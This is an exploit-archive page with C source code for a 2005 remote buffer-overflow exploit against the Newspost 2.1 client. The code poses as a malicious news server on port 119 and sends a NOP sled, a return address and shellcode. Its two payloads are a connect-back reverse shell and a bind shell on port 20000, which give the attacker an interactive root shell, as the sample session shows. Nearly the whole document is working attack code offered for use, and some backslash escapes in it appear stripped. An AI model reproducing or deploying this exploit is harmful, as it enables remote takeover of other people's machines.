[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Newspost 2.1 socket_getline() Remote Buffer Overflow Exploit v2
# Published : 2005-02-03
# Author : cybertronic
# Previous Title : 3CServer 1.1 FTP Server Remote Exploit
# Next Title : Savant Web Server 3.1 Remote Buffer OverflowExploit (win2003)
/*
* v0.2
* Newspost "socket_getline()" Buffer Overflow Exploit
* Exploit
* Bug discovered: 02/03/2005
*
* cybertronic[at]gmx[dot]net
*
* [ cybertronic @ newspost ] $ gcc -o newspost_expl newspost_expl.c
* [ cybertronic @ newspost ] $ ./newspost_expl cyber tronic
* Usage
* -----
* [ Bindshell ] ./newspost_expl
* [ Reverseshell ] ./newspost_expl [CONNECTBACK IP]
* [ cybertronic @ newspost ] $ ./newspost_expl
*
* __ __ _
* _______ __/ /_ ___ _____/ /__________ ____ (_)____
* / ___/ / / / __ / _ / ___/ __/ ___/ __ / __ / / ___/
* / /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__
* ___/__, /_.___/___/_/ __/_/ ____/_/ /_/_/___/
* /____/
*
* --[ exploit by : cybertronic - cybertronic[at]gmx[dot]net
* --[ newspost-2.1 remote exploit
* --[ enter retaddr [ 0 = default ]
* >> 0
* --[ listening...OK!
* --[ Incomming connection from: 192.168.2.103
* --[ using bind shellcode!
* --[ retaddr: 0xbfffee01
* --[ sending packet [ 1056 bytes ]...done!
* --[ sleeping 5 seconds before connecting to 192.168.2.103:20000...
* --[ connecting to 192.168.2.103:20000...done!
* --[ b0x pwned - h4ve phun
* id
* uid=0(root) gid=0(root) groups=0(root)
*
*/
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#define RED "E[31mE[1m"
#define GREEN "E[32mE[1m"
#define YELLOW "E[33mE[1m"
#define BLUE "E[34mE[1m"
#define NORMAL "E[m"
#define PORT 119
int isip ( char *ip );
int shell ( int s, char* tip, unsigned short cbport );
void connect_to_bindshell ( char* tip, unsigned short bport );
void exploit ( int s, char* ip, unsigned long lip, unsigned long ret, int option );
void header ();
void start_reverse_handler ( unsigned short cbport );
void wait ( int sec );
//131 bytes connect back 45295, greetz to esDee
char linux_connect_back[] =
"x31xc0x31xdbx31xc9x51xb1"
"x06x51xb1x01x51xb1x02x51"
"x89xe1xb3x01xb0x66xcdx80"
"x89xc2x31xc0x31xc9x51x51"
"x68x41x42x43x44x66x68xb0"
"xefxb1x02x66x51x89xe7xb3"
"x10x53x57x52x89xe1xb3x03"
"xb0x66xcdx80x31xc9x39xc1"
"x74x06x31xc0xb0x01xcdx80"
"x31xc0xb0x3fx89xd3xcdx80"
"x31xc0xb0x3fx89xd3xb1x01"
"xcdx80x31xc0xb0x3fx89xd3"
"xb1x02xcdx80x31xc0x31xd2"
"x50x68x6ex2fx73x68x68x2f"
"x2fx62x69x89xe3x50x53x89"
"xe1xb0x0bxcdx80x31xc0xb0"
"x01xcdx80";
//92 bytes bindcode port 20000
char scode[] =
"x31xdb" // xor ebx, ebx
"xf7xe3" // mul ebx
"xb0x66" // mov al, 102
"x53" // push ebx
"x43" // inc ebx
"x53" // push ebx
"x43" // inc ebx
"x53" // push ebx
"x89xe1" // mov ecx, esp
"x4b" // dec ebx
"xcdx80" // int 80h
"x89xc7" // mov edi, eax
"x52" // push edx
"x66x68x4ex20" // push word 8270
"x43" // inc ebx
"x66x53" // push bx
"x89xe1" // mov ecx, esp
"xb0xef" // mov al, 239
"xf6xd0" // not al
"x50" // push eax
"x51" // push ecx
"x57" // push edi
"x89xe1" // mov ecx, esp
"xb0x66" // mov al, 102
"xcdx80" // int 80h
"xb0x66" // mov al, 102
"x43" // inc ebx
"x43" // inc ebx
"xcdx80" // int 80h
"x50" // push eax
"x50" // push eax
"x57" // push edi
"x89xe1" // mov ecx, esp
"x43" // inc ebx
"xb0x66" // mov al, 102
"xcdx80" // int 80h
"x89xd9" // mov ecx, ebx
"x89xc3" // mov ebx, eax
"xb0x3f" // mov al, 63
"x49" // dec ecx
"xcdx80" // int 80h
"x41" // inc ecx
"xe2xf8" // loop lp
"x51" // push ecx
"x68x6ex2fx73x68" // push dword 68732f6eh
"x68x2fx2fx62x69" // push dword 69622f2fh
"x89xe3" // mov ebx, esp
"x51" // push ecx
"x53" // push ebx
"x89xe1" // mov ecx, esp
"xb0xf4" // mov al, 244
"xf6xd0" // not al
"xcdx80"; // int 80h
int
isip ( char *ip )
{
int a, b, c, d;
if ( !sscanf ( ip, "%d.%d.%d.%d", &a, &b, &c, &d ) )
return ( 0 );
if ( a < 1 )
return ( 0 );
if ( a > 255 )
return 0;
if ( b < 0 )
return 0;
if ( b > 255 )
return 0;
if ( c < 0 )
return 0;
if ( c > 255 )
return 0;
if ( d < 0 )
return 0;
if ( d > 255 )
return 0;
return 1;
}
int
shell ( int s, char* tip, unsigned short cbport )
{
int n;
char buffer[2048];
fd_set fd_read;
printf ( "--[" YELLOW " b" NORMAL "0" YELLOW "x " NORMAL "p" YELLOW "w" NORMAL "n" YELLOW "e" NORMAL "d " YELLOW "- " NORMAL "h" YELLOW "4" NORMAL "v" YELLOW "e " NORMAL "p" YELLOW "h" NORMAL "u" YELLOW "n" NORMAL "n" );
FD_ZERO ( &fd_read );
FD_SET ( s, &fd_read );
FD_SET ( 0, &fd_read );
while ( 1 )
{
FD_SET ( s, &fd_read );
FD_SET ( 0, &fd_read );
if ( select ( s + 1, &fd_read, NULL, NULL, NULL ) < 0 )
break;
if ( FD_ISSET ( s, &fd_read ) )
{
if ( ( n = recv ( s, buffer, sizeof ( buffer ), 0 ) ) < 0 )
{
printf ( "bye bye...n" );
return;
}
if ( write ( 1, buffer, n ) < 0 )
{
printf ( "bye bye...n" );
return;
}
}
if ( FD_ISSET ( 0, &fd_read ) )
{
if ( ( n = read ( 0, buffer, sizeof ( buffer ) ) ) < 0 )
{
printf ( "bye bye...n" );
return;
}
if ( send ( s, buffer, n, 0 ) < 0 )
{
printf ( "bye bye...n" );
return;
}
}
usleep(10);
}
}
void
connect_to_bindshell ( char* tip, unsigned short bport )
{
int s;
int sec = 5; // change this for fast targets
struct sockaddr_in remote_addr;
struct hostent *host_addr;
if ( ( host_addr = gethostbyname ( tip ) ) == NULL )
{
fprintf ( stderr, "cannot resolve "%s"n", tip );
exit ( 1 );
}
remote_addr.sin_family = AF_INET;
remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
remote_addr.sin_port = htons ( bport );
if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
{
printf ( "socket failed!n" );
exit ( 1 );
}
printf ( "--[ sleeping %d seconds before connecting to %s:%u...n", sec, tip, bport );
wait ( sec );
printf ( "--[ connecting to %s:%u...", tip, bport );
if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )
{
printf ( RED "failed!n" NORMAL);
exit ( 1 );
}
printf ( YELLOW "done!n" NORMAL);
shell ( s, tip, bport );
}
void
exploit ( int s, char* ip, unsigned long lip, unsigned long ret, int option )
{
char out[1200];
bzero ( &out, 1200 );
memset ( out, 0x90, 1052 );
printf ( "--[ retaddr: 0x%08xn", ret );
strncat ( out, ( unsigned char* ) &ret, 4 );
if ( option == 0 )
{
memcpy ( &linux_connect_back[33], &lip, 4);
memcpy ( out + 649, linux_connect_back, sizeof ( linux_connect_back ) - 1 );
}
else
memcpy ( out + 649, scode, sizeof ( scode ) - 1 );
printf ( "--[ sending packet [ %u bytes ]...", strlen ( out ) );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "FAILED!n" NORMAL);
exit ( 1 );
}
printf ( YELLOW "done!n" NORMAL);
close ( s );
}
void
header ()
{
printf ( " __ __ _ n" );
printf ( " _______ __/ /_ ___ _____/ /__________ ____ (_)____ n" );
printf ( " / ___/ / / / __ \/ _ \/ ___/ __/ ___/ __ \/ __ \/ / ___/ n" );
printf ( "/ /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__ n" );
printf ( "\___/\__, /_.___/\___/_/ \__/_/ \____/_/ /_/_/\___/ n" );
printf ( " /____/ nn" );
printf ( "--[ exploit by : cybertronic - cybertronic[at]gmx[dot]netn" );
}
void
start_reverse_handler ( unsigned short cbport )
{
int s1, s2;
struct sockaddr_in cliaddr, servaddr;
socklen_t clilen = sizeof ( cliaddr );
bzero ( &servaddr, sizeof ( servaddr ) );
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
servaddr.sin_port = htons ( cbport );
printf ( "--[ starting reverse handler [port: %u]...", cbport );
if ( ( s1 = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
{
printf ( "socket failed!n" );
exit ( 1 );
}
bind ( s1, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );
if ( listen ( s1, 1 ) == -1 )
{
printf ( "listen failed!n" );
exit ( 1 );
}
printf ( YELLOW "done!n" NORMAL);
if ( ( s2 = accept ( s1, ( struct sockaddr * ) &cliaddr, &clilen ) ) < 0 )
{
printf ( "accept failed!n" );
exit ( 1 );
}
close ( s1 );
printf ( "--[ incomming connection from:t" YELLOW " %sn" NORMAL, inet_ntoa ( cliaddr.sin_addr ) );
shell ( s2, ( char* ) inet_ntoa ( cliaddr.sin_addr ), cbport );
close ( s2 );
}
void
wait ( int sec )
{
sleep ( sec );
}
int
main ( int argc, char* argv[] )
{
int s1, s2;
unsigned long lip;
unsigned long ret = 0;
char* ip;
pid_t childpid;
socklen_t clilen;
struct sockaddr_in cliaddr, servaddr;
if ( argc != 1 )
if ( argc != 2 )
{
fprintf ( stderr, "Usagen-----n[ Bindshell ] %sn[ Reverseshell ] %s [CONNECTBACK IP]n", argv[0], argv[0] );
exit ( 1 );
}
system ( "clear" );
header ();
if ( argc == 2 )
{
if ( !isip ( argv[1] ) )
{
printf ( "--[ Invalid connectback IP!n" );
exit ( 1 );
}
}
if ( ( s1 = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
exit ( 1 );
bzero ( &servaddr, sizeof ( servaddr ) );
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
servaddr.sin_port = htons ( PORT );
bind ( s1, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );
printf ( "--[ newspost-2.1 remote exploitn" );
printf ( "--[ enter retaddr [ 0 = default ]n" );
printf ( ">> " );
scanf ( "%x", &ret );
if ( ret == 0 )
ret = 0xbfffee01;
printf ( "--[ listening..." );
if ( listen ( s1, 1 ) == -1 )
{
printf ( RED "FAILED!n" NORMAL );
exit ( 1 );
}
printf ( GREEN "OK!n" NORMAL );
clilen = sizeof ( cliaddr );
if ( ( s2 = accept ( s1, ( struct sockaddr * ) &cliaddr, &clilen ) ) < 0 )
exit ( 1 );
close ( s1 );
printf ( "--[" GREEN " Incomming connection from:t %sn" NORMAL, inet_ntoa ( cliaddr.sin_addr ) );
if ( argc == 2 )
{
printf ( "--[" YELLOW " using connect back shellcode!n" NORMAL );
lip = inet_addr ( argv[1] );
exploit ( s2, ( char* ) NULL, lip, ret, 0 );
start_reverse_handler ( 45295 );
}
else
{
printf ( "--[" YELLOW " using bind shellcode!n" NORMAL );
ip = ( char* ) inet_ntoa ( cliaddr.sin_addr );
exploit ( s2, ip, ( unsigned long ) NULL, ret, 1 );
connect_to_bindshell ( ip, 20000 );
}
}
// www.Syue.com [2005-02-03]